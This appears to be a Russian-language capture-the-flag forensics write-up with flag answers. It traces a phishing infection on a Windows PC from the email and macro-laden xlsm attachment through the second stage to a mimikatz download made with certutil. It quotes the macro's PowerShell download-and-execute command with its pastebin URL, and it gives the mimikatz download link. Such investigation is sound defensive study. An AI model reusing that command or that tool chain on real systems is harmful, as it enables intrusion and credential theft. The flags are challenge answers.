56 lines
3.9 KiB
Markdown
56 lines
3.9 KiB
Markdown
## Q1) Укажите версию установленного Microsoft Office
|
||
|
||
1) Проверили файл `C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE`.
|
||
2) Из PE‑ресурса `FileVersion/ProductVersion` получил версию.
|
||
|
||
Итог: `caplag{12.0.4518.1014}`
|
||
|
||
## Q2) Определите начальный вектор атаки. Укажите почту, откуда пришел вирусный файл и название файла (с расширением). формат: email_filename
|
||
|
||
1) В профиле Thunderbird открыли письмо: `C:\Users\PC31\AppData\Roaming\thunderbird\Profiles\g59pkejj.default-release\Mail\Local Folders\mail.eml`.
|
||
2) В заголовках письма: `From: "HR Department" <hr@gdhwiXzuedhi.org>`.
|
||
3) Во вложениях письма: `filename="shtatnoe-raspisanie.xlsm"`.
|
||
|
||
Итог: `caplag{hr@gdhwiXzuedhi.org_shtatnoe-raspisanie.xlsm}`
|
||
|
||
## Q3) Укажите ссылку, которая использовалась для загрузки и запуска второй стадии атаки
|
||
|
||
1) Открыли `C:\Users\PC31\Documents\shtatnoe-raspisanie.xlsm`.
|
||
2) `olevba` показал `Workbook_Open`, где строка дважды декодируется из base64.
|
||
3) После декодирования получен URL: `https://pastebin.com/raw/hz2rEByR`, который передается в `powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(...)`.
|
||
|
||
Итог: `caplag{https://pastebin.com/raw/hz2rEByR}`
|
||
|
||
## Q4) Через Reverse shell хакер скачал еще один вредоносный файл для третей стадии атаки. Укажите URL
|
||
|
||
1) Открыли кеш загрузок CryptoAPI: `C:\Users\PC31\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E417CD142DEC44E17C581F01DB81204`.
|
||
2) Внутри файла в UTF‑16LE хранится полный URL загрузки архива.
|
||
|
||
Итог: `caplag{https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip}`
|
||
|
||
## Q5) Укажите полный путь к архиву где лежит mimikatz и название программы (c расширением) с помощью которой хакер скачал его. формат: Path_filename
|
||
|
||
1) В `C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf` (после распаковки MAM/LZXPRESS‑Huffman) в списке ссылок указаны файлы:
|
||
- `C:\Users\PC31\AppData\Local\Temp\.settings.zip`
|
||
- `C:\Windows\SysWOW64\certutil.exe`
|
||
2) Это подтверждает, что архив с mimikatz сохранен как `.settings.zip`, а скачивание выполнено `certutil.exe`.
|
||
|
||
Итог: `caplag{C:\Users\PC31\AppData\Local\Temp\.settings.zip_certutil.exe}`
|
||
|
||
## Q6) Укажите полную дату последнего запуска certutil.exe и кол-во запусков этой программы. формат: дд.мм.гггг/чч:мм:cc_count.
|
||
|
||
1) В `C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf` распаковали MAM‑блок (LZXPRESS‑Huffman).
|
||
2) В распакованном файле:
|
||
- `last_run_time` (FILETIME) находится по смещению `0x80` → `2025‑06‑30 12:18:36Z` (UTC).
|
||
- `run_count` (DWORD) по смещению `0xC8` → `1`.
|
||
3) Перевод в локальное время (UTC+3) дает `30.06.2025 15:18:36`.
|
||
|
||
Итог: `caplag{30.06.2025/15:18:36_1}`
|
||
|
||
## Q7) Укажите сайт который пользователь посетил больше всего
|
||
|
||
1) История браузера пользователя находится в Edge: `C:\Users\PC31\AppData\Local\Microsoft\Edge\User Data\Default\History`.
|
||
2) В SQLite‑таблице `urls` максимальный `visit_count` у страниц домена `unisender.com`.
|
||
|
||
Итог: `caplag{https://www.unisender.com}`
|